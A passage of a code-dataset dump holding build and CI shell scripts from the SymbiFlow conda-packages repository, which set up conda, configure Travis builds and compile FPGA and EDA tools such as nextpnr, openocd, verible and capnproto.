string.ascii_uppercase:\n skip = False\n if sline[0] in ('[', '=', '!', '+'):\n skip = False\n\n if skip != last_skip:\n output_to.write('\\n')\n\n if skip:\n output_to.write('.')\n else:\n output_to.write(line)\n\n output_to.flush()\n line_bits.clear()\n return skip\n\n\ndef find_newline(data):\n fulldata = b\"\".join(data)\n newlinechar = fulldata.find(b'\\n')\n retlinechar = fulldata.find(b'\\r')\n\n if newlinechar == -1:\n newlinechar = len(fulldata)+1\n if retlinechar == -1:\n retlinechar = len(fulldata)+1\n\n if retlinechar+1 == newlinechar:\n splitpos = newlinechar\n else:\n splitpos = min(newlinechar, retlinechar)\n\n if splitpos > len(fulldata):\n return\n\n newline = fulldata[:splitpos+1]\n leftover = fulldata[splitpos+1:]\n\n data.clear()\n data.append(leftover)\n return newline\n\n\nlast_skip = False\ncont = []\ndata = [b'']\nwhile True:\n line = None\n while len(data) > 1 or len(data[0]) > 0 or child.isalive():\n line = find_newline(data)\n if line is not None:\n break\n try:\n data.append(child.read_nonblocking(100))\n except pexpect.TIMEOUT:\n pass\n except pexpect.EOF as e:\n data.append(b'\\n')\n\n if not line:\n break\n\n line = line.decode('utf-8')\n logfile.write(line)\n logfile.flush()\n\n if line.endswith('\\r'):\n cont.append(line[:-1])\n last_skip = output_line(cont, last_skip)\n cont.append('\\r')\n continue\n\n sline = line.strip('\\n\\r')\n cont.append(sline)\n if sline.endswith('\\\\'):\n continue\n\n cont.append('\\n')\n last_skip = output_line(cont, last_skip)\n\nsys.exit(child.exitstatus)\n" }, { "alpha_fraction": 0.700127899646759, "alphanum_fraction": 0.7116368412971497, "avg_line_length": 23.4375, "blob_id": "0d486444261df352113855796a6d3c176c8e5016", "content_id": "a58d00a87584dc29dabf15efbd5d4436aee95065", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1564, "license_type": "permissive", "max_line_length": 83, "num_lines": 64, "path": "/conda-get.sh", "repo_name": "SymbiFlow/conda-packages", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nset -e\n\nCONDA_PATH=${1:-~/conda}\n\necho \"Downloading Conda installer.\"\nwget -c https://repo.continuum.io/miniconda/Miniconda3-latest-Linux-x86_64.sh\nchmod a+x Miniconda3-latest-Linux-x86_64.sh\n\nif [ ! 
-d $CONDA_PATH ]; then\n\techo \"Installing conda\"\n ./Miniconda3-latest-Linux-x86_64.sh -p $CONDA_PATH -b -f\nfi\nexport PATH=$CONDA_PATH/bin:$PATH\n\nfunction patch_conda() {\n\t# Patch conda to prevent a users ~/.condarc from infecting the build\n\tfor F in $CONDA_PATH/lib/python3.*/site-packages/conda/common/configuration.py; do\n\t\tif grep -q \"# FIXME: Patched conda\" $F; then\n\t\t\techo \"Already patched $F\"\n\t\telse\n\t\t\techo \"Patching $F\"\n\t\t\tcat >> $F <<'EOF'\n\n# FIXME: Patched conda\n_load_file_configs = load_file_configs\ndef load_file_configs(search_path):\n return _load_file_configs([p for p in search_path if p.startswith('$CONDA_')])\nEOF\n\t\tfi\n\tdone\n}\n\npatch_conda\n\ncat > $CONDA_PATH/condarc <<'EOF'\n# Useful for automation\nshow_channel_urls: True\n\n# Prevent conda from automagically updating things\nauto_update_conda: False\nupdate_dependencies: False\n# Don't complain\nnotify_outdated_conda: false\n# Add channels\nchannel_priority: strict\nchannels:\nEOF\nCONDA_CHANNEL=$(echo $TRAVIS_REPO_SLUG | sed -e's@/.*$@@')\nif [ x$CONDA_CHANNEL != x ];then\ncat >> $CONDA_PATH/condarc <<EOF\n - $CONDA_CHANNEL\nEOF\nfi\ncat >> $CONDA_PATH/condarc <<'EOF'\n - symbiflow\n - defaults\nEOF\n\n# Install required build tools\nconda install -y conda-build anaconda-client jinja2 conda-verify ripgrep pexpect\n\nconda info | grep --color=always -e \"^\" -e \"populated config files\"\n" }, { "alpha_fraction": 0.692307710647583, "alphanum_fraction": 0.692307710647583, "avg_line_length": 8.75, "blob_id": "c40aa7fc2d7a8f9e9a297ad56aaefd799b4117d1", "content_id": "1044fa8f837a247274624f916512ac4e86e7b336", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 39, "license_type": "permissive", "max_line_length": 15, "num_lines": 4, "path": "/capnproto-java/build.sh", "repo_name": "SymbiFlow/conda-packages", "src_encoding": "UTF-8", "text": "#!/bin/bash -ex\n\nmake all\nmake install\n" }, { "alpha_fraction": 0.7416974306106567, "alphanum_fraction": 0.7416974306106567, "avg_line_length": 22.565217971801758, "blob_id": "5c6127e965fe1fc4cfb383b25698f6e96552a3e8", "content_id": "f8423d11c855cfb998399729aaca400ea4cdfb21", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 542, "license_type": "permissive", "max_line_length": 71, "num_lines": 23, "path": "/.travis/fixup-git.sh", "repo_name": "SymbiFlow/conda-packages", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nsource $TRAVIS_BUILD_DIR/.travis/common.sh\nset -e\n\n# Git repo fixup\nstart_section \"environment.git\" \"Setting up ${YELLOW}git checkout${NC}\"\nset -x\ngit fetch --unshallow || true\ngit fetch --tags\ngit submodule update --recursive --init\ngit submodule foreach git submodule update --recursive --init\n$SPACER\ngit remote -v\ngit branch -v\ngit branch -D $TRAVIS_BRANCH\nCURRENT_GITREV=\"$(git rev-parse HEAD)\"\ngit checkout -b $TRAVIS_BRANCH $CURRENT_GITREV\ngit tag -l\ngit status -v\ngit describe --long\nset +x\nend_section \"environment.git\"\n" }, { "alpha_fraction": 0.7075471878051758, "alphanum_fraction": 0.7075471878051758, "avg_line_length": 29.285715103149414, "blob_id": "d158d2e7e6156a849264021d295ea431fbee1454", "content_id": "676dab6578b4b3224654238c897e0d22a479476e", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 212, "license_type": "permissive", "max_line_length": 81, "num_lines": 7, "path": 
"/uhdm-integration/surelog-flow.sh", "repo_name": "SymbiFlow/conda-packages", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nmkdir -p \"$PREFIX/bin\"\nmkdir -p \"$PREFIX/lib/surelog/sv\"\n\ncp \"$SRC_DIR/image/lib/surelog/sv/builtin.sv\" \"$PREFIX/lib/surelog/sv/builtin.sv\"\ncp \"$SRC_DIR/image/bin/surelog\" \"$PREFIX/bin/surelog-uhdm\"\n" }, { "alpha_fraction": 0.7210662961006165, "alphanum_fraction": 0.7217165231704712, "avg_line_length": 27.481481552124023, "blob_id": "88114d44359b857155e0446ce5f1aa184ed2ad08", "content_id": "a653f4a259b1caac405c756cb155d23a4576a00c", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1538, "license_type": "permissive", "max_line_length": 90, "num_lines": 54, "path": "/.travis/install.sh", "repo_name": "SymbiFlow/conda-packages", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nsource $TRAVIS_BUILD_DIR/.travis/common.sh\nset -e\n\nif [ ! -z \"$USE_SYSTEM_GCC_VERSION\" ]; then\n\tsudo add-apt-repository ppa:ubuntu-toolchain-r/test -y\n\tsudo apt update\n\tsudo apt install -y gcc-${USE_SYSTEM_GCC_VERSION} g++-${USE_SYSTEM_GCC_VERSION}\nfi\n\nif [ ! -z \"$USE_PYPY\" ]; then\n\tsudo add-apt-repository ppa:pypy/ppa -y\n\tsudo apt update\n\tsudo apt install -y pypy3\nfi\n\n# Getting the conda environment\nstart_section \"environment.conda\" \"Setting up basic ${YELLOW}conda environment${NC}\"\n\nmkdir -p $BASE_PATH\n./conda-get.sh $CONDA_PATH\nhash -r\nend_section \"environment.conda\"\n\n$SPACER\n\n# Output some useful info\nstart_section \"info.conda.env\" \"Info on ${YELLOW}conda environment${NC}\"\n$TRAVIS_BUILD_DIR/conda-env.sh info\nend_section \"info.conda.env\"\n\nstart_section \"info.conda.config\" \"Info on ${YELLOW}conda config${NC}\"\n$TRAVIS_BUILD_DIR/conda-env.sh config --show\nend_section \"info.conda.config\"\n\nstart_section \"info.conda.package\" \"Info on ${YELLOW}conda package${NC}\"\n$TRAVIS_BUILD_DIR/conda-env.sh render --no-source $CONDA_BUILD_ARGS || true\nend_section \"info.conda.package\"\n\n$SPACER\n\nstart_section \"conda.copy\" \"${GREEN}Copying package...${NC}\"\nmkdir -p /tmp/conda/$PACKAGE\ncp -vRL $PACKAGE/* /tmp/conda/$PACKAGE/\ncd /tmp/conda/\nsed -e\"s@git_url:.*://@$CONDA_PATH/conda-bld/git_cache/@\" -i /tmp/conda/$PACKAGE/meta.yaml\nend_section \"conda.copy\"\n\n$SPACER\n\nstart_section \"conda.download\" \"${GREEN}Downloading..${NC}\"\n$TRAVIS_BUILD_DIR/conda-env.sh build --source $CONDA_BUILD_ARGS || true\nend_section \"conda.download\"\n" }, { "alpha_fraction": 0.6802167892456055, "alphanum_fraction": 0.6829268336296082, "avg_line_length": 15.043478012084961, "blob_id": "277b9db44930bac86989d44b62dd86b518619645", "content_id": "fd65d9f8ac5282611a22ea6e9a3245045d9c73cd", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 369, "license_type": "permissive", "max_line_length": 59, "num_lines": 23, "path": "/sigrok-cli/build.sh", "repo_name": "SymbiFlow/conda-packages", "src_encoding": "UTF-8", "text": "#! 
/bin/bash\n\nset -e\nset -x\n\nif [ x\"$TRAVIS\" = xtrue ]; then\n\tCPU_COUNT=2\nfi\n\nunset CXXFLAGS # Will be set by configure below\n\nfor f in libserialport libsigrok libsigrokdecode sigrok-cli\ndo\n\tcd $f\n\t./autogen.sh\n\t./configure --prefix=$PREFIX\n\tmake -j$CPU_COUNT\n\tmake install\n\tcd -\ndone\n\n$PREFIX/bin/sigrok-cli -V\nfind $PREFIX/share -name \"__pycache__\" -exec rm -rv {} +\n" }, { "alpha_fraction": 0.628742516040802, "alphanum_fraction": 0.6317365169525146, "avg_line_length": 22.85714340209961, "blob_id": "9b565ae95fa8496325373a290ce218e201d35c21", "content_id": "237a68f25d6b23ee4b03bcc584945f58b295f70a", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 668, "license_type": "permissive", "max_line_length": 70, "num_lines": 28, "path": "/conda-meta-extra.sh", "repo_name": "SymbiFlow/conda-packages", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nPACKAGE=${1:-PACKAGE}\nif [ x$PACKAGE = x\"\" ]; then\n\techo \"\\$PACKAGE not set!\"\n\texit 1\nfi\n\nrm -f $PACKAGE/recipe_append.yaml\ncat > $PACKAGE/recipe_append.yaml <<EOF\nextra:\n maintainers:\n - Tim 'mithro' Ansell <mithro@mithis.com>\n - SymbiFlow Project - https://symbiflow.github.io\n travis:\n job_id: $TRAVIS_JOB_ID\n job_num: $TRAVIS_JOB_NUMBER\n type: $TRAVIS_EVENT_TYPE\n recipe:\n repo: 'https://github.com/$TRAVIS_REPO_SLUG'\n branch: $TRAVIS_BRANCH\n commit: $TRAVIS_COMMIT\n describe: $GITREV\n date: $DATESTR\nEOF\nif [ -e $PACKAGE/condarc ]; then\n\tcat $PACKAGE/condarc | sed -e's/^/ /' >> $PACKAGE/recipe_append.yaml\nfi\n" }, { "alpha_fraction": 0.6803278923034668, "alphanum_fraction": 0.6926229596138, "avg_line_length": 19.33333396911621, "blob_id": "2707c5a17a44e0ff7f0d06f52d8e3a8bfe117d67", "content_id": "e1d21e7ef8275be43a45eed746918b6abe1f40d7", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 244, "license_type": "permissive", "max_line_length": 119, "num_lines": 12, "path": "/nextpnr-ice40/build.sh", "repo_name": "SymbiFlow/conda-packages", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nset -e\nset -x\n\nif [ x\"$TRAVIS\" = xtrue ]; then\n\tCPU_COUNT=2\nfi\n\ncmake -DARCH=ice40 -DBUILD_GUI=OFF -DICEBOX_ROOT=${PREFIX}/share/icebox -DCMAKE_INSTALL_PREFIX=/ -DENABLE_READLINE=No .\nmake -j$(nproc)\nmake DESTDIR=${PREFIX} install\n" }, { "alpha_fraction": 0.6693404912948608, "alphanum_fraction": 0.6742424368858337, "avg_line_length": 29.324323654174805, "blob_id": "b8c377a2bbd5610ceef553fd853e7396f2c1242e", "content_id": "00c18a1ba2dddccfc18b1b07c37da78e7d33cdf9", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 2244, "license_type": "permissive", "max_line_length": 118, "num_lines": 74, "path": "/conda-env.sh", "repo_name": "SymbiFlow/conda-packages", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nexport CONDA_PATH=${CONDA_PATH:-~/conda}\nif [ ! -d $CONDA_PATH ];then\n\techo \"Conda not found at $CONDA_PATH\"\n\texit 1\nfi\nif [ ! -f $CONDA_PATH/bin/activate ];then\n\techo \"conda's bin/activate not found in $CONDA_PATH\"\n\texit 1\nfi\nif [ x$PACKAGE = x\"\" ]; then\n\techo \"\\$PACKAGE not set.\"\n\texit 1\nfi\n\n# Disable this warning;\n# xxxx/conda_build/environ.py:377: UserWarning: The environment variable\n# 'TRAVIS' is being passed through with value 0. 
If you are splitting\n# build and test phases with --no-test, please ensure that this value is\n# also set similarly at test time.\nexport PYTHONWARNINGS=ignore::UserWarning:conda_build.environ\n\nif [ -z \"$DATE_STR\" ]; then\n\texport DATE_NUM=\"$(date -u +%y%m%d%H%M)\"\n\texport DATE_STR=\"$(date -u +%Y%m%d_%H%M%S)\"\n\techo \"Setting date number to $DATE_NUM\"\n\techo \"Setting date string to $DATE_STR\"\nfi\nif [ -z \"$GITREV\" ]; then\n\texport GITREV=\"$(git describe --long)\"\n\techo \"Setting git revision $GITREV\"\nfi\n\nexport TRAVIS=0\nexport CI=0\n\nexport TRAVIS_EVENT_TYPE=${TRAVIS_EVENT_TYPE:-\"local\"}\necho \"TRAVIS_EVENT_TYPE='${TRAVIS_EVENT_TYPE}'\"\n\nexport TRAVIS_BRANCH=\"${TRAVIS_BRANCH:-$(git rev-parse --abbrev-ref HEAD)}\"\necho \"TRAVIS_BRANCH='${TRAVIS_BRANCH}'\"\n\nexport TRAVIS_COMMIT=\"${TRAVIS_BRANCH:-$(git rev-parse HEAD)}\"\necho \"TRAVIS_COMMIT='${TRAVIS_COMMIT}'\"\n\nexport TRAVIS_REPO_SLUG=\"${TRAVIS_REPO_SLUG:-$(git remote get-url origin | sed -e's-.*github\\.com/--' -e's/\\.git//')}\"\necho \"TRAVIS_REPO_SLUG='${TRAVIS_REPO_SLUG}'\"\n\n# >>> conda initialize >>>\n# !! Contents within this block are managed by 'conda init' !!\n__conda_setup=\"$(\"$CONDA_PATH/bin/conda\" 'shell.bash' 'hook' 2> /dev/null)\"\nif [ $? -eq 0 ]; then\n eval \"$__conda_setup\"\nelse\n if [ -f \"$CONDA_PATH/etc/profile.d/conda.sh\" ]; then\n . \"$CONDA_PATH/etc/profile.d/conda.sh\"\n else\n export PATH=\"$CONDA_PATH/bin:$PATH\"\n fi\nfi\nunset __conda_setup\n# <<< conda initialize <<<\n\nexport CONDARC=$CONDA_PATH/.condarc\nPACKAGE_ENV=$CONDA_PATH/envs/$PACKAGE\nif [ ! -d $PACKAGE_ENV ]; then\n\tconda create --yes --name $PACKAGE --strict-channel-priority\n\tln -sf $(realpath $PACKAGE/condarc) $PACKAGE_ENV/condarc\nfi\nconda activate $PACKAGE\n./conda-meta-extra.sh $PACKAGE\n./conda-tag-filter.sh $PACKAGE\nconda $@\n" }, { "alpha_fraction": 0.6805251836776733, "alphanum_fraction": 0.7330415844917297, "avg_line_length": 23.052631378173828, "blob_id": "3538a1e2a695190ee73413346e31b8e9fa23280e", "content_id": "d036918653df04cb509cfa340e6fd19e658c335a", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 457, "license_type": "permissive", "max_line_length": 102, "num_lines": 19, "path": "/verible/build.sh", "repo_name": "SymbiFlow/conda-packages", "src_encoding": "UTF-8", "text": "#! 
/bin/bash\n\nset -e\nset -x\n\nexport CC=gcc-${USE_SYSTEM_GCC_VERSION}\nexport CXX=g++-${USE_SYSTEM_GCC_VERSION}\n\n\nmkdir bazel-install\nBAZEL_PREFIX=$PWD/bazel-install\n\nwget https://github.com/bazelbuild/bazel/releases/download/3.7.2/bazel-3.7.2-installer-linux-x86_64.sh\nchmod +x bazel-3.7.2-installer-linux-x86_64.sh\n./bazel-3.7.2-installer-linux-x86_64.sh --prefix=$BAZEL_PREFIX\n\nexport PATH=$BAZEL_PREFIX/bin:$PATH\n\nbazel run :install -c opt -- $PREFIX/bin\n" }, { "alpha_fraction": 0.6428571343421936, "alphanum_fraction": 0.6428571343421936, "avg_line_length": 12.833333015441895, "blob_id": "b1403c6641a43b467b44adcfb3195e56a9c87c01", "content_id": "a464c76bc13a62c334604f6b158c0c06750a11e1", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 84, "license_type": "permissive", "max_line_length": 32, "num_lines": 6, "path": "/libusb/build.sh", "repo_name": "SymbiFlow/conda-packages", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n./configure --prefix=\"$PREFIX\" \\\n --disable-udev\nmake\nmake install\n\n" }, { "alpha_fraction": 0.7078059315681458, "alphanum_fraction": 0.7383966445922852, "avg_line_length": 29.580644607543945, "blob_id": "e4f9d23ab96e748c4286dd9fc1262e68738ed9db", "content_id": "743c1bd6aef1fb6c8278fb1ad7a7ec08208f1c9f", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 948, "license_type": "permissive", "max_line_length": 145, "num_lines": 31, "path": "/iceprog/build.sh", "repo_name": "SymbiFlow/conda-packages", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nset -e\nset -x\n\nif [ x\"$TRAVIS\" = xtrue ]; then\n\tCPU_COUNT=2\nfi\n\nunset CFLAGS\nunset CXXFLAGS\nunset CPPFLAGS\nunset DEBUG_CXXFLAGS\nunset DEBUG_CPPFLAGS\nunset LDFLAGS\n\nINCLUDES=\"$(PKG_CONFIG_PATH=/usr/lib/x86_64-linux-gnu/pkgconfig pkg-config --dont-define-prefix --cflags libftdi1 libusb libudev)\"\nINCLUDES='-I/usr/include/libftdi1 -I/usr/include/libusb-1.0'\nSTATIC_LIBS=\"$(PKG_CONFIG_PATH=/usr/lib/x86_64-linux-gnu/pkgconfig pkg-config --dont-define-prefix --libs libftdi1 libusb)\"\nSTATIC_LIBS=\"-L/usr/lib/x86_64-linux-gnu -lftdi1 -lusb-1.0 -lusb\"\nDYNAMIC_LIBS=\"$(PKG_CONFIG_PATH=/usr/lib/x86_64-linux-gnu/pkgconfig pkg-config --dont-define-prefix --libs libudev)\"\nDYNAMIC_LIBS=\"-L/lib/x86_64-linux-gnu -ludev\"\n\nexport CFLAGS=\"$CFLAGS $INCLUDES\"\nexport LDFLAGS=\"$LDFLAGS -lm -lstdc++ -lpthread -Wl,--whole-archive -Wl,-Bstatic $STATIC_LIBS -Wl,-Bdynamic -Wl,--no-whole-archive $DYNAMIC_LIBS\"\n\nmake -j$CPU_COUNT\n\nmake install\n\niceprog -h\n" }, { "alpha_fraction": 0.707848846912384, "alphanum_fraction": 0.707848846912384, "avg_line_length": 23.140350341796875, "blob_id": "7afdf7f0a3d82c9905d4aeaf7504ec96c40f2eae", "content_id": "4b3af2c516b385fae7a0b18506e7f52698880cee", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1376, "license_type": "permissive", "max_line_length": 159, "num_lines": 57, "path": "/.travis/script.sh", "repo_name": "SymbiFlow/conda-packages", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nsource .travis/common.sh\nset -e\n\n$SPACER\n\nstart_section \"info.conda.package\" \"Info on ${YELLOW}conda package${NC}\"\n$TRAVIS_BUILD_DIR/conda-env.sh render $CONDA_BUILD_ARGS\nend_section \"info.conda.package\"\n\n$SPACER\n\nstart_section \"conda.check\" \"${GREEN}Checking...${NC}\"\n$TRAVIS_BUILD_DIR/conda-env.sh build --check $CONDA_BUILD_ARGS || 
true\nend_section \"conda.check\"\n\n$SPACER\n\nstart_section \"conda.build\" \"${GREEN}Building..${NC}\"\nif [[ \"${KEEP_ALIVE}\" = 'true' ]]; then\n\ttravis_wait $TRAVIS_MAX_TIME $CONDA_PATH/bin/python $TRAVIS_BUILD_DIR/.travis-output.py /tmp/output.log $TRAVIS_BUILD_DIR/conda-env.sh build $CONDA_BUILD_ARGS\nelse\n\t$CONDA_PATH/bin/python $TRAVIS_BUILD_DIR/.travis-output.py /tmp/output.log $TRAVIS_BUILD_DIR/conda-env.sh build $CONDA_BUILD_ARGS\nfi\nend_section \"conda.build\"\n\n$SPACER\n\n# Remove trailing ';' and split CONDA_OUT into array of packages\nIFS=';' read -r -a PACKAGES <<< \"${CONDA_OUT%?}\"\n\nstart_section \"conda.build\" \"${GREEN}Installing..${NC}\"\nfor element in \"${PACKAGES[@]}\"\ndo\n\t$TRAVIS_BUILD_DIR/conda-env.sh install $element\ndone\nend_section \"conda.build\"\n\n$SPACER\n\nstart_section \"conda.du\" \"${GREEN}Disk usage..${NC}\"\n\nfor element in \"${PACKAGES[@]}\"\ndo\n\tdu -h $element\ndone\n\nend_section \"conda.du\"\n\n$SPACER\n\nstart_section \"conda.clean\" \"${GREEN}Cleaning up..${NC}\"\n#conda clean -s --dry-run\nend_section \"conda.clean\"\n\n$SPACER\n" }, { "alpha_fraction": 0.6378269791603088, "alphanum_fraction": 0.6841046214103699, "avg_line_length": 15.032258033752441, "blob_id": "ed771ad547029956095a32d0d8a6b029b2dd899a", "content_id": "4ab4bb0736dfa57e13bd5f04aa941ab5b8c74384", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 503, "license_type": "permissive", "max_line_length": 52, "num_lines": 31, "path": "/openocd/build.sh", "repo_name": "SymbiFlow/conda-packages", "src_encoding": "UTF-8", "text": "#! /bin/bash\n\nset -e\nset -x\n\nif [ x\"$TRAVIS\" = xtrue ]; then\n\tCPU_COUNT=2\nelse\n\tCPU_COUNT=$(nproc)\nfi\n\nmv tcl/target/1986ве1т.cfg tcl/target/1986be1t.cfg\nmv tcl/target/к1879xб1я.cfg tcl/target/k1879x61r.cfg\n\nexport LIBS=\"$LIBS -lrt -lpthread\"\n\n./bootstrap\nmkdir build\ncd build\n../configure \\\n --prefix=$PREFIX \\\n --enable-static \\\n --disable-shared \\\n --enable-usb-blaster-2 \\\n --enable-usb_blaster_libftdi \\\n --enable-jtag_vpi \\\n --enable-remote-bitbang \\\n\n\nmake -j$CPU_COUNT\nmake install\n" }, { "alpha_fraction": 0.648790717124939, "alphanum_fraction": 0.663512110710144, "avg_line_length": 28.71875, "blob_id": "b04e81f64834227a98c6bd82a691a991793e9d81", "content_id": "d574bd9340450890bbdb61bee155d41a4a063fec", "detected_licenses": [ "BSD-3-Clause", "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 951, "license_type": "permissive", "max_line_length": 103, "num_lines": 32, "path": "/capnproto/build.sh", "repo_name": "SymbiFlow/conda-packages", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nset -x\n\nmkdir build\ncd build\n\ndeclare -a CMAKE_PLATFORM_FLAGS\nif [[ ${HOST} =~ .*darwin.* ]]; then\n CMAKE_PLATFORM_FLAGS+=(-DCMAKE_OSX_SYSROOT=\"${CONDA_BUILD_SYSROOT}\")\n # \"-stdlib=libc++ -mmacosx-version-min=10.7\" are required to enable C++11 features\n #CMAKE_CXX_FLAGS=\"$CMAKE_CXX_FLAGS -stdlib=libc++ -mmacosx-version-min=10.7\"\n #EXTRA_CMAKE_ARGS=\"-DCMAKE_OSX_DEPLOYMENT_TARGET=10.7\"\n # Disable testing on OS X due to CMake config bugs fixed only in master:\n # https://github.com/sandstorm-io/capnproto/issues/322\n EXTRA_CMAKE_ARGS=\"$EXTRA_CMAKE_ARGS -DBUILD_TESTING=OFF -DCMAKE_CXX_COMPILE_FEATURES=cxx_constexpr\"\nfi\n\ncmake \\\n -DCMAKE_BUILD_TYPE=Release \\\n -DCMAKE_INSTALL_PREFIX=\"$PREFIX\" \\\n -DCMAKE_INSTALL_LIBDIR=\"lib\" \\\n $EXTRA_CMAKE_ARGS \\\n ../c++\n\ncmake --build . 
-- -j ${CPU_COUNT}\n\nif [ \"$(uname)\" != \"Darwin\" ]; then\n cmake --build . --target check\nfi\n\ncmake --build . --target install\n" }, { "alpha_fraction": 0.7215189933776855, "alphanum_fraction": 0.7215189933776855, "avg_line_length": 25.33333396911621, "blob_id": "f947effd5e7928e0d5409541f384120cb1b5a819", "content_id": "6826d390631263fbb5019070dd56f03c094e2661", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 316, "license_type": "permissive", "max_line_length": 118, "num_lines": 12, "path": "/tree-sitter-verilog/build.sh", "repo_name": "SymbiFlow/conda-packages", "src_encoding": "UTF-8", "text": "#! /bin/bash\n\nset -e\nset -x\n\nnpm install tree-sitter-cli\n\n./node_modules/tree-sitter-cli/tree-sitter generate\n\n$PYTHON -m pip install --isolated tree_sitter\n$PYTHON -c \"from tree_sitter import Language; Language.build_library(\\\"$PREFIX/lib/tree-sitter-verilog.so\\\", [\\\".\\\"])\"\n$PYTHON -m pip uninstall -y tree_sitter\n" }, { "alpha_fraction": 0.7243107557296753, "alphanum_fraction": 0.7243107557296753, "avg_line_length": 38.900001525878906, "blob_id": "5a089d2e79f7f0414a532801f400030fccb61ff0", "content_id": "643516680ff64ed18ad4d7113900324b25bbad25", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 399, "license_type": "permissive", "max_line_length": 78, "num_lines": 10, "path": "/uhdm-integration/verilator-flow.sh", "repo_name": "SymbiFlow/conda-packages", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nmkdir -p \"$PREFIX/bin\"\n\nsed -i 's/\"verilator_bin\"/\"verilator_bin-uhdm\"/g' image/bin/verilator\nsed -i 's/\"verilator_bin_dbg\"/\"verilator_bin_dbg-uhdm\"/g' image/bin/verilator\n\ncp \"$SRC_DIR/image/bin/verilator\" \"$PREFIX/bin/verilator-uhdm\"\ncp \"$SRC_DIR/image/bin/verilator_bin\" \"$PREFIX/bin/verilator_bin-uhdm\"\ncp \"$SRC_DIR/image/bin/verilator_bin_dbg\" \"$PREFIX/bin/verilator_bin_dbg-uhdm\"\n" }, { "alpha_fraction": 0.7034482955932617, "alphanum_fraction": 0.7068965435028076, "avg_line_length": 18.33333396911621, "blob_id": "dedafac32622a43f955a554e483894e23d214a1f", "content_id": "a9b4110a8debccd479563d21aec119843e028a98", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 290, "license_type": "permissive", "max_line_length": 59, "num_lines": 15, "path": "/surelog/build.sh", "repo_name": "SymbiFlow/conda-packages", "src_encoding": "UTF-8", "text": "#! 
/bin/bash\n\nset -e\nset -x\n\nif [ x\"$TRAVIS\" = xtrue ]; then\n CPU_COUNT=2\nfi\n\nexport PKG_CONFIG_PATH=\"$BUILD_PREFIX/lib/pkgconfig/\"\nexport CXXFLAGS=\"$CXXFLAGS -I$BUILD_PREFIX/include\"\nexport LDFLAGS=\"$CXXFLAGS -L$BUILD_PREFIX/lib -lrt -ltinfo\"\n\nmake -j$CPU_COUNT\nmake -j$CPU_COUNT install\n" }, { "alpha_fraction": 0.6590909361839294, "alphanum_fraction": 0.6590909361839294, "avg_line_length": 16.600000381469727, "blob_id": "fe77290e01912422d46115f4abf598af1a895936", "content_id": "4d259216d32541a6e9c673ff5db0ad04e100ac72", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 88, "license_type": "permissive", "max_line_length": 50, "num_lines": 5, "path": "/uhdm-integration/yosys-flow.sh", "repo_name": "SymbiFlow/conda-packages", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nmkdir -p \"$PREFIX/bin\"\n\ncp \"$SRC_DIR/yosys/yosys\" \"$PREFIX/bin/yosys-uhdm\"\n" }, { "alpha_fraction": 0.6538461446762085, "alphanum_fraction": 0.6794871687889099, "avg_line_length": 10.142857551574707, "blob_id": "79063c3f9204265f96c639318711ea8424746e8e", "content_id": "4c6e67f4c2ad15e1a0071b956c44c33dbc2d5526", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 78, "license_type": "permissive", "max_line_length": 43, "num_lines": 7, "path": "/zachjs-sv2v/build.sh", "repo_name": "SymbiFlow/conda-packages", "src_encoding": "UTF-8", "text": "#! /bin/bash\n\nset -e\nset -x\n\nmake\ninstall -D bin/sv2v $PREFIX/bin/zachjs-sv2v\n" }, { "alpha_fraction": 0.5431893467903137, "alphanum_fraction": 0.5431893467903137, "avg_line_length": 21.296297073364258, "blob_id": "5732a3b628958841ff52b36270f6b54710ac345c", "content_id": "cf49b3674c1e34bc47a04e00f7b0189bdd358315", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1204, "license_type": "permissive", "max_line_length": 57, "num_lines": 54, "path": "/iverilog/run_test.sh", "repo_name": "SymbiFlow/conda-packages", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nset -e\nset 